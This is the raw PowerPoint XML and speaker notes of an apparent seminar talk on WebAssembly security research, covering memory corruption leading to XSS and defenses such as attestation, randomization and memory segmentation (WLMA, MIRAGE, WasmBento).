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4"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId32"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="584" r:id="rId5"/>
    <p:sldId id="559" r:id="rId6"/>
    <p:sldId id="507" r:id="rId7"/>
    <p:sldId id="581" r:id="rId8"/>
    <p:sldId id="540" r:id="rId9"/>
    <p:sldId id="575" r:id="rId10"/>
    <p:sldId id="572" r:id="rId11"/>
    <p:sldId id="565" r:id="rId12"/>
    <p:sldId id="577" r:id="rId13"/>
    <p:sldId id="579" r:id="rId14"/>
    <p:sldId id="576" r:id="rId15"/>
    <p:sldId id="580" r:id="rId16"/>
    <p:sldId id="583" r:id="rId17"/>
    <p:sldId id="569" r:id="rId18"/>
    <p:sldId id="582" r:id="rId19"/>
    <p:sldId id="593" r:id="rId20"/>
    <p:sldId id="601" r:id="rId21"/>
    <p:sldId id="594" r:id="rId22"/>
    <p:sldId id="596" r:id="rId23"/>
    <p:sldId id="595" r:id="rId24"/>
    <p:sldId id="597" r:id="rId25"/>
    <p:sldId id="599" r:id="rId26"/>
    <p:sldId id="600" r:id="rId27"/>
    <p:sldId id="603" r:id="rId28"/>
    <p:sldId id="608" r:id="rId29"/>
    <p:sldId id="605" r:id="rId30"/>
    <p:sldId id="60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30035CF-D692-4B9D-80C6-E0B02DD1C051}">
          <p14:sldIdLst>
            <p14:sldId id="584"/>
            <p14:sldId id="559"/>
            <p14:sldId id="507"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Memory Corruption and XSS" id="{BCBE76DA-015D-4449-941B-9C1B2F7AA4D6}">
          <p14:sldIdLst>
            <p14:sldId id="581"/>
            <p14:sldId id="540"/>
            <p14:sldId id="575"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Wemby" id="{45BE1EDC-9C9E-4434-AC3D-8AA4263A1403}">
          <p14:sldIdLst>
            <p14:sldId id="572"/>
            <p14:sldId id="565"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Foxhound and findings" id="{4C8206F7-09A4-4A1C-87AA-CC7B2689E4D8}">
          <p14:sldIdLst>
            <p14:sldId id="577"/>
            <p14:sldId id="579"/>
            <p14:sldId id="576"/>
            <p14:sldId id="580"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Eval" id="{D1CF718F-CDF5-4021-9444-6741EB9E40A9}">
          <p14:sldIdLst>
            <p14:sldId id="583"/>
            <p14:sldId id="569"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="M" id="{C2DF0C36-BF64-4808-875F-7A3FC4246B40}">
          <p14:sldIdLst>
            <p14:sldId id="582"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Smuggling" id="{C3E5CCD0-D53D-41E8-B1DF-A4FC856044CD}">
          <p14:sldIdLst>
            <p14:sldId id="593"/>
            <p14:sldId id="601"/>
            <p14:sldId id="594"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Attestation" id="{FBC5BDFE-1063-4A40-8310-32A02DF0037C}">
          <p14:sldIdLst>
            <p14:sldId id="596"/>
            <p14:sldId id="595"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Randomization" id="{FAA8A856-EA46-4860-B492-B30A44E319FE}">
          <p14:sldIdLst>
            <p14:sldId id="597"/>
            <p14:sldId id="599"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Segmentation" id="{AC6690B3-E3C6-4037-8529-0FB53EC1CA2E}">
          <p14:sldIdLst>
            <p14:sldId id="600"/>
            <p14:sldId id="603"/>
            <p14:sldId id="608"/>
            <p14:sldId id="605"/>
            <p14:sldId id="6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746"/>
    <a:srgbClr val="7C60C6"/>
    <a:srgbClr val="00B050"/>
    <a:srgbClr val="C9492C"/>
    <a:srgbClr val="FFC6C6"/>
    <a:srgbClr val="EED1AB"/>
    <a:srgbClr val="FF7474"/>
    <a:srgbClr val="85311D"/>
    <a:srgbClr val="8B64C8"/>
    <a:srgbClr val="D58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E13D8-3AF6-B1DA-BCCA-64DE353E451C}" v="2" dt="2026-06-09T17:43:13.698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47" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="66" d="100"/>
          <a:sy n="66" d="100"/>
        </p:scale>
        <p:origin x="73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1-04T13:25:38.91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0,'0'0,"0"7,0 8,0 9,0 3,0 6,0 2,0-3,0 4,0-1,0-4,0 3,0 6,0-1,0-4,0-4,0-5,0-7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7E43-F3CB-456A-A31C-34B20693F101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8FC68-7E98-4962-8BF7-8868440A953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3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86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an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> do in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? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Here,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websites</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>trust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coming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potentially</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>corrupt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>memory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sinks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>, like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>eval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sessionStorage</a:t>
            </a:r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opens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door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like XSS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devastating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, Persistent XSS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>which</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Triggers XSS on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summarize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, …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81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1AF0E-7C48-0C9A-9E69-532343C9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E5E9C9-BE82-C947-2E3D-0FA2C0B2A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ED5BF7A-0406-8D1B-C277-9A49BADB5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We demonstrated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Wasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> memory corruption escalating to XSS on a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Wemby</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> identified </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>unsanitized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> WebSocket data and critical linear memory offsets, enabling overwrites of strings (i.e., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Date.now</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>to create timestamps) directly consumed by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>eval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4425B6-F963-FA42-6845-160779B8E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57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51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yourself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websites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interact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security-critical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>sinks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looked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websites</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>,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an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>extremly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de-DE" dirty="0" err="1"/>
              <a:t>OnePlus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de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>So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looked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: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websites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JS code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obfuscated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>. 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visit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notice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somehow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>uses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.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>But ist also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obfuscated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Wemby</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>,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unraveled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mess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>, and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multiple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>websites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: a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obfuscated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>less</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> invasive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>technique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r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Google </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Adsense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trace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behavior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Around</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> 1000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>domains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>alone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Google </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Adsense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23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Thus,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directon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follow. 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issue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facing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differentiate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p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benign</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>behavor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Malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>behavior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>, HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>smuggling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>requires</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> a </a:t>
            </a:r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taint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>tracking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>approach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614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Wemby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unveil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sensitive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transformed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reaches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security-critical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>sinks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>performing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>A network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comprehend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transformation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.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not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>needed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corruption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. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>However</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>, ist a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>ust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fully </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>comprehend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> HTML and JS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>smuggling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on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>, and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progress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> so </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>far</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Hopefully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finish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year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29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Other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conducting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>again</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>,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corruption</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Wasm</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Is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detect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exploitation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Here,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WLMA</a:t>
            </a:r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aligns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S2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93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Again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cutecats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contains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> a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, </a:t>
            </a:r>
          </a:p>
          <a:p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chubby</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>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Wemby</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>fuzzer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. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>And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stateful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infer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Wasm</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>State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corrupt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benign</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Here,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ML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train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fuzzer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So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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>proof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>containing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attestator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passing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execution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WLMA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runtime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185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, in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WLMA,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exploitation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>harder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attacker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Here,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reinventing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wheel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re-introduce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>randomization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7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Again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cutecats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. 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bug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attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>, and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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>exploit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what</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> MIRAGE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>does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compiles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source code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, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>With a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allocator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>. </a:t>
            </a:r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allocated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chunk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, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Will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positioned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> at a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. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Thus,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attacker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not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loaded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security-critical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> sink </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>resides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47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Usually the developer would rewrite this app to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>however, the developer can now compile it to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>webassembly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> module. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This module can then be directly embedded into the web app. Here we see that the image decoding function is now directly accessible from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As if it is a normal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> function. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This simple example shows one of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wasms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> strengths: its portability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>And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,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finds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> ist </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>way</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>more</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> and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popular</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> and prominent web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636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Okay,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. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Here,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ourselves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exploiation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>And </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> highlight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word</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> USER. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>WLMA and MIRAGE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adjustments</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Webapp. But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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>buggy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Browser-plugin,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browsing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333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imagine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ambitious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different </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>reeasons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First,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drop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>-in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>replacement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</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Obviously</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Wasmbento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not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module</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Next,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dont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source code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>here</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>, ist </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>completly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>binary-only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Finally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a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>reasonable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overhead</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>.</a:t>
            </a:r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dont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wait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> 5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website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load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068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BCF4E-8E21-2AA5-1CB3-DBFD49F65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357D7E-35CC-B31B-AE97-83CBA1DF4D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98583C-E863-803C-5BF4-4D1860594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original </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Wasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> code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CuteCats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>app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loads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a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>cat</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p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final time,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bug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attacker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WasmBento</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>, and Bento it.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different </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Sections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>. Here,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Cat Image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Heap Memory, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>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reamining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accordingly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code. So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So,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bug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an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>attacker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isolated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area</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/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tag,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loaded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security-critical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> sink </a:t>
            </a:r>
          </a:p>
          <a:p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corrupted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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>WasmBento</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>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57AB36-4A4F-EF76-72A0-961E41AAB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328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conclude</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>summarize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seminar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/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comphrehend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malicious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</a:p>
          <a:p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attestation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memory</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p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introducing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>fine-grained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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>randomization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modules</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>And </a:t>
            </a:r>
            <a:r>
